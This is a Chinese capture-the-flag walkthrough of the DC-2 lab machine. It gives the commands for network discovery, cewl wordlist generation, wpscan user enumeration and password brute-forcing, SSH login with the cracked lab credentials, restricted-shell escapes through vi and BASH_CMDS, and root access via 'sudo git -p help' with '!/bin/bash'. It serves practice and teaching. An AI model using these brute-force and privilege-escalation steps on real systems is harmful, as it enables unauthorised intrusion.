DC-2靶机详细渗透过程

1.靶机部署

kali安装：https://blog.csdn.net/l2872253606/article/details/123592717?spm=1001.2014.3001.5502
靶机下载： https://www.five86.com/downloads/DC-2.zip
解压后得到一个.ova的文件：

使用VMware打开该文件：

设置好名称和虚拟机位置：
注意：导入过程中可能会提示导入失败，点击重试即可。

导入成功，打开虚拟机，到此虚拟机部署完成！

注意：靶机的网络连接模式必须和kali一直，让DC靶机跟kali处于同一网段，这用kali才能扫出DC的主机。

2.渗透过程

打开kali，为了便于操作，建议使用root用户登录kali。

2.1 信息收集

2.1.1 探测目标IP地址

探测主机的工具有很多，常见的有arp-scan、nmap还有netdiscover

arp-scan -l

netdiscover

ip后面改为了0/24, 在这里“192.168.120.0/24”表示的是这个网段的IP地址从从192.168.120.1开始，到192.168.120.254结束（192.168.120.0和192.168.120.255有特殊含义不能当做ip地址）；子网掩码是255.255.255.0

nmap -sP 192.168.11.0/24

如果是真实的生产环境中，我们需要对存活的IP进行进一步的扫描和排查，最终才能确定我们要测试的目标，但本次是练习使用，我们直接可以查看靶机的Mac地址，更快的帮助我们确定靶机的IP。

确定了DC主机的IP地址为：

192.168.11.131  00:0c:29:18:16:fb       VMware, Inc.

2.1.2 探测IP开放的端口

浏览器访问http://192.168.11.131，发现无法正常访问页面，但在url地址栏会有http://dc-2域名提示，发现问题是本地无法解析域名dc-2

这时候就意识到对方可能做了重定向，在本机的host文件中加入ip地址和域名：

192.168.11.131  dc-2

host文件地址：C:\Windows\System32\drivers\etc
提示：有火绒的可以直接改：

再次访问，访问成功：

2.2 漏洞查找与应用

找到flag1：

Flag 1:

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.

你常用的词汇表可能不起作用，所以，也许你只需要cewl。
密码越多越好，但有时你不可能赢得所有密码。
作为一个登录查看下一个标志。
如果找不到，请以另一个用户登录。

分析flag1的内容，大概意思是需要登陆才能查看下一个flag，还提示使用cewl，出门时wordpress，cewl就是kali的一个字典生产工具，是一个ruby应用。

2.3 根据dc-2生成字典

根据网站利用cewl生成密码并写入文档：

cewl -w dc-passwd.txt http://dc-2

2.4 扫描用户名

我们访问的时候已经看到网站的CMS为WordPress，那我们就可以使用wpscan对网站进行扫描：

wpscan --ignore-main-redirect --url 192.168.11.131 --enumerate u --force

将扫描到的三个用户名写入到文本中，稍后爆破使用：

2.5 爆破

爆破之后得到两组用户名和密码

wpscan --url http://dc-2/ -U user.txt -P dc-passwd.txt

2.6 查找网站登录页面

2.6.1 dirb

dirb http://dc-2/  

2.6.2 Nikto

nikto -host http://dc-2/

2.6.3 访问网站登录页面

http://dc-2/wp-login.php

2.6.4 使用破解的账号密码进行登录

账号：jerry
密码：adipiscing

浏览网站，找到flag2：

If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.

如果你不能利用WordPress走捷径，还有另一种方法。
希望你找到了另一个入口。

2.7 漏洞利用

flag2提示wordpress已经走不通了，我们在扫描端口时还发现对方开启了ssh服务，使用破解得到的账号密码尝试，两个账号都试一遍，最后使用tom账号登录成功：

ssh tom@192.168.11.131 -p 7744
密码：parturient

2.7.1 使用得到后的账号密码ssh登录后发现flag3.txt，但是无法查看，应该是权限不够，现在有两种解决办法:

其一：使用vi，less，more，git等可 提权的命令测试。该靶机可使用vi flag3.txt，发现可以访问。

ls                       #查看当前目录所有文件
cat flag3.txt            #查看flag3.txt的内容
vi flag3.txt             #编辑flag3.txt的内容

使用vi命令可以查看其内容：

其二：绕过

查看当前的环境变量：

echo $PATH

可以发现我们当前的环境变量是在：/home/tom/usr/bin下面，所以我们的shell被限制了，这导致我们不能执行一些命令，方法有很多，这里简单介绍两种：

• 通过转义环境变量的方式

vi 4.txt          #随便打开一个txt文件，文件名随意
末端输入：set shell=/bin/bash
按一下esc，载输入：shell（注意有冒号）

• 定义一个环境变量，然后再添加我们新的环境变量，这样才能得到一个不受限的shell

BASH_CMDS[a]=/bin/sh ； a  #调用/bin/sh命令解释器
/bin/bash   #使用bash命令解释器

无论哪种方法，都要创建一个环境变量：

export PATH=$PATH:/bin/

下面使用定义环境变量的方式演示一下：

BASH_CMDS[a]=/bin/sh;a       #注：把 /bin/sh 给a变量并调用
export PATH=$PATH:/bin/      #注：将 /bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin   #注：将 /usr/bin 作为PATH环境变量导出

2.7.2 使用 vi 查看成功，观察 flag3 中的内容，发现文本中包含 Jerry 和 su ，所以猜测需要使用 su jerry 登录到 jerry 用户下，因为我们上一步已经进行绕过了，所以直接使用su命令切换到jerry

su jerry
密码：adipiscing

2.7.3 登录成功后切换到jerry的家目录，发现flag4

Good to see that you've made it this far - but you're not home yet. 
You still need to get the final flag (the only flag that really counts!!!).  
No hints here - you're on your own now.  :-)
Go on - git outta here!!!!

很高兴看到你已经走了这么远——但你还没有回家。
你仍然需要获得最后的旗帜(唯一真正重要的旗帜!!)
这里没有提示，你现在要靠自己了。: -)
走吧，离开这里!!!!

2.8 提权

查看flag4后发现这并不是最后的flag，提示信息说到了git，查看可以使用root权限的命令，发现git可以使用，通过git提权

sudo -l

提权：

sudo git -p help
 !/bin/bash 在最后输入该命令进行提权

2.9 最后的flag

3.收获总结

• 使用 nmap 找寻并扫描靶机。
• 修改 hosts 文件来访问网站。
• 使用 dirsearch 爆破网站目录。
• 使用 cewl 制作字典。
• 使用 wpscan 对 WordPress 站点进行扫描和爆破。
• rbash 绕过
• sudo 提权
• git 提权